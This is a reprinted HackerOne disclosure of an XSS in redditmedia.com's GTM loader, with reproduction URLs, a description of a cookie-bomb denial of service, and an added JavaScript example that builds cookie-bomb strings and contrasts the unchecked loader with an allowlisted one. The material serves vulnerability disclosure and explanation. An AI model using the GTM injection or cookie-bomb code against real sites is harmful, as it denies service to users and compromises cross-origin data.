Reddit: XSS in redditmedia.com can compromise data of reddit.com

HackerOne report #862882 (hackerone.com)
Reported by keer0k, Apr 29, 2020 - 11:02 p.m. (2020-04-29 23:02:52)

Description

Hi, I would like to report an XSS in redditmedia.com that can affect the reddit.com application. redditmedia.com is the domain that reddit.com uses to get all the thumbnails of any post.

I found that redditmedia.com/gtm/jail uses the “id” parameter to get a valid GTM id and import it from Google Tag Manager. With that, I can create a Google Tag Manager account, create my own HTML and generate a valid GTM id to be introduced at redditmedia.com/gtm/jail.

I created a GTM with the content <html> <img src> </html> and it worked. The XSS was triggered. You can check using the id GTM-KM2VT3H.

I discovered two scenarios that can affect reddit.com. One of them is using this XSS to make a cookie bomb, creating a large number of cookies for .redditmedia.com that will make the service unavailable to the user (only for the user who accesses the malicious GTM page).

The PoC for this case is as follows:

<html>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
<img src>
</html>

PS: you need to put this code into your GTM tag.

After the user accesses the GTM page containing this content, thumbnails, videos and other media embedded on reddit.com will not be displayed (the media that come from redditmedia.com).

The second case is where it would be even more dangerous; however, I was unable to reproduce it, because for it to work I would need a JSONP endpoint at *.redditmedia.com, and I didn’t find one. But anyway, I will explain the case.

If I had a hypothetical JSONP at redditmedia.com/anypath/?jsonp=xxx, I could use this JSONP as a chain for my XSS to write a service worker into the application. This way, no matter what ID was opened at redditmedia.com/gtm/jail?id=, I could control the page and make it return a malicious script to reddit.com, creating the possibility of affecting users on reddit.com.

Steps to reproduce the XSS

  1. Go to https://redditmedia.com/gtm/jail?id=GTM-KM2VT3H&cb=aa
  2. The XSS will be triggered

Steps to reproduce the XSS to cookie bomb

  1. Go to https://redditmedia.com/gtm/jail?id==GTM-MS246QG&cb=aa
  2. The cookies will be added
  3. Navigate to https://reddit.com/
  4. Some thumbnails, images and other media will not appear

Impact

It's possible to compromise that cross-origin and destabilize a website for the user.
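The following JavaScript is an added example for this report, not the reporter's PoC (whose payload the page does not reproduce beyond the stripped <img> tags). It models the two mechanisms the report relies on: a loader endpoint that fetches whatever GTM container id the caller names, placed beside an assumed hardened version that allowlists container ids, and the cookie bomb itself, showing how many near-maximum-size cookies scoped to the parent domain inflate the Cookie header that the browser then attaches to every redditmedia.com request. The function names, the 4000-byte cookie value, the 8 KiB server header limit, the .redditmedia.com scoping and the allowlist contents are all assumptions for illustration; the JSONP/service-worker chain is not modelled because the report could not reproduce it.

```javascript
// Added example (not the reporter's PoC): models the GTM loader and the
// cookie bomb from the report.  Names, limits and allowlist are assumptions.

const GTM_ID_RE = /^GTM-[A-Z0-9]{4,8}$/;   // container id shape (assumed)
const GTM_LOADER = 'https://www.googletagmanager.com/gtm.js?id=';

// Vulnerable shape: the id is taken from the query string and used as-is,
// so any container the attacker created is loaded into the page's origin.
function resolveGtmContainerUnchecked(rawId) {
  return rawId ? GTM_LOADER + encodeURIComponent(rawId) : null;
}

// Assumed hardening: accept only a well-formed id that is also on an explicit
// allowlist of containers the site owns.  A stray leading "=" (as in the
// report's second URL) or an unknown container is rejected, not loaded.
function resolveGtmContainer(rawId, allowlist) {
  if (typeof rawId !== 'string' || !GTM_ID_RE.test(rawId)) return null;
  if (!allowlist.has(rawId)) return null;
  return GTM_LOADER + encodeURIComponent(rawId);
}

// Cookie-bomb side.  Browsers keep a cookie only while name+value stays under
// roughly 4096 bytes, so each cookie is padded to just below that (assumed).
const COOKIE_VALUE_BYTES = 4000;

// Set-Cookie strings an attacker-controlled page would emit (one per
// document.cookie assignment) for the shared parent domain.
function buildCookieBomb(count, domain, path = '/') {
  const cookies = [];
  for (let i = 0; i < count; i++) {
    const value = 'x'.repeat(COOKIE_VALUE_BYTES);
    cookies.push(`bomb${i}=${value}; Domain=${domain}; Path=${path}; Max-Age=31536000`);
  }
  return cookies;
}

// Bytes of the Cookie request header the browser attaches to every later
// request for any host under that domain (only name=value pairs are sent).
function cookieHeaderBytes(setCookies) {
  return setCookies.map(c => c.split(';')[0]).join('; ').length;
}

// Whether a server with the given request-header limit still answers.  8 KiB
// is a common default (assumed here); once exceeded the server rejects every
// request, which is why the victim's thumbnails and videos stop loading.
function serverAcceptsHeader(headerBytes, limitBytes = 8192) {
  return headerBytes <= limitBytes;
}

// Clean-up a fix page would have to emit: one expiring Set-Cookie per name,
// carrying the same Domain and Path attributes as the originals.
function disarmCookieBomb(setCookies) {
  return setCookies.map(c => {
    const [pair, ...attrs] = c.split('; ');
    const name = pair.split('=')[0];
    const scope = attrs.filter(a => /^(Domain|Path)=/.test(a)).join('; ');
    return `${name}=; ${scope}; Max-Age=0`;
  });
}

// Stand-alone run: 34 cookies, the number of <img> tags in the PoC above.
function main() {
  const bomb = buildCookieBomb(34, '.redditmedia.com');
  const bytes = cookieHeaderBytes(bomb);
  console.log(`Cookie header: ${bytes} bytes; server accepts: ${serverAcceptsHeader(bytes)}`);
  console.log('unchecked:', resolveGtmContainerUnchecked('GTM-KM2VT3H'));
  console.log('allowlisted:', resolveGtmContainer('GTM-KM2VT3H', new Set(['GTM-EXAMPLE'])));
  console.log('disarm:', disarmCookieBomb(bomb.slice(0, 1))[0]);
}
main();
```

With 34 cookies the modelled Cookie header is well over 130 KB, far past any common per-header limit, so every image, video and script request to the bombed domain fails until the cookies are expired; the unchecked resolver happily builds a loader URL for an attacker's container, while the allowlisted one returns null for it.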